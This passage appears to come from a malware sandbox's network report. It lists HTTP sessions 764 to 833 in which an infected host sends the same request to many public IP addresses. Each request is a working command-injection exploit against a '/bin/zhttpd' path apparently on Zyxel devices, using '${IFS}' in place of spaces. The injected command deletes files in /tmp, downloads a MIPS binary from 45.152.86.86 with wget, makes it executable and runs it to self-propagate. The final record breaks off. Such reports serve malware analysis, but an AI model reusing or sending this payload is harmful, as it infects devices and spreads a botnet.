                              764192.168.2.13386168.242.228.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503994942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              765192.168.2.135247679.70.51.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504055023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              766192.168.2.134521419.109.219.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504091978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              767192.168.2.1359688223.73.50.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504125118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              768192.168.2.135774464.155.9.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504158974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              769192.168.2.135707057.205.43.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504220963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              770192.168.2.134045620.106.248.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504240036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              771192.168.2.1339264165.251.250.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504275084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              772192.168.2.133334295.2.223.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504347086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              773192.168.2.1335794106.166.22.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504363060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              774192.168.2.1341180108.74.8.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504394054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              775192.168.2.1349486205.191.201.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504462004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              776192.168.2.1347226202.199.99.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504487991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              777192.168.2.1351390121.32.118.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504519939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              778192.168.2.1351828149.148.21.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504571915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              779192.168.2.1338340175.7.128.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504605055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              780192.168.2.1354748188.157.209.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504682064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              781192.168.2.1335446137.106.170.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504690886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              782192.168.2.1355870160.197.90.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504745007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              783192.168.2.134729447.38.19.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504771948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              784192.168.2.13581144.73.29.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504822969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              785192.168.2.1354506208.243.186.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504856110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              786192.168.2.135606250.186.3.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504894972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              787192.168.2.1340824183.211.59.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504921913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              788192.168.2.1356338171.80.140.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.504976034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              789192.168.2.1359084148.185.209.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505012035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              790192.168.2.1352830205.50.220.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505057096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              791192.168.2.134055619.235.147.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505083084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              792192.168.2.1338944100.30.172.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505148888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              793192.168.2.134979692.142.227.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505172014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              794192.168.2.1349728165.231.91.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505203009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              795192.168.2.134764091.44.74.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505259991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              796192.168.2.1340654181.234.170.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505295992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              797192.168.2.1346438101.206.232.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505351067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              798192.168.2.1343150190.253.152.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505392075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              799192.168.2.1356674123.111.57.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505448103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              800192.168.2.133826620.130.20.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505455017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              801192.168.2.1339690184.1.62.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505507946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              802192.168.2.1350504114.44.191.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505542994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              803192.168.2.134640686.58.143.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505580902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              804192.168.2.1337928149.170.10.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505614996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              805192.168.2.135027071.113.102.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505670071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              806192.168.2.133947824.140.24.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505716085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              807192.168.2.1340960184.178.231.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505769968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              808192.168.2.135628865.222.153.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505800009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              809192.168.2.1336220155.203.219.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505829096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              810192.168.2.1352036188.67.144.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505877018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              811192.168.2.134340499.110.46.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505911112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              812192.168.2.1349034113.175.95.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505942106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              813192.168.2.134408497.19.93.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.505990982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              814192.168.2.1355496112.245.165.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506031036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              815192.168.2.1358098217.139.238.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506068945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              816192.168.2.1356624177.81.51.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506098986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              817192.168.2.1335224125.46.104.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506138086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              818192.168.2.1352180184.51.157.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506170988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              819192.168.2.1351206192.248.125.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506218910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              820192.168.2.1334674199.42.35.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506254911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              821192.168.2.1358258174.82.221.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506314993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              822192.168.2.1357142156.110.93.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506360054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              823192.168.2.134016040.32.188.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506392002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              824192.168.2.1345794118.148.162.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506443977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              825192.168.2.1352682125.111.184.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506488085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              826192.168.2.1342490140.1.237.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506526947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              827192.168.2.1343608203.109.181.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506556034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              828192.168.2.1351672186.108.105.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506633997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              829192.168.2.135403237.10.199.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506634951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              830192.168.2.1348336113.184.63.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506663084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              831192.168.2.133868062.233.70.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506715059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              832192.168.2.1344338219.24.160.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506768942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              833192.168.2.1351856212.101.68.209443
                              TimestampBytes transferredDirectionData
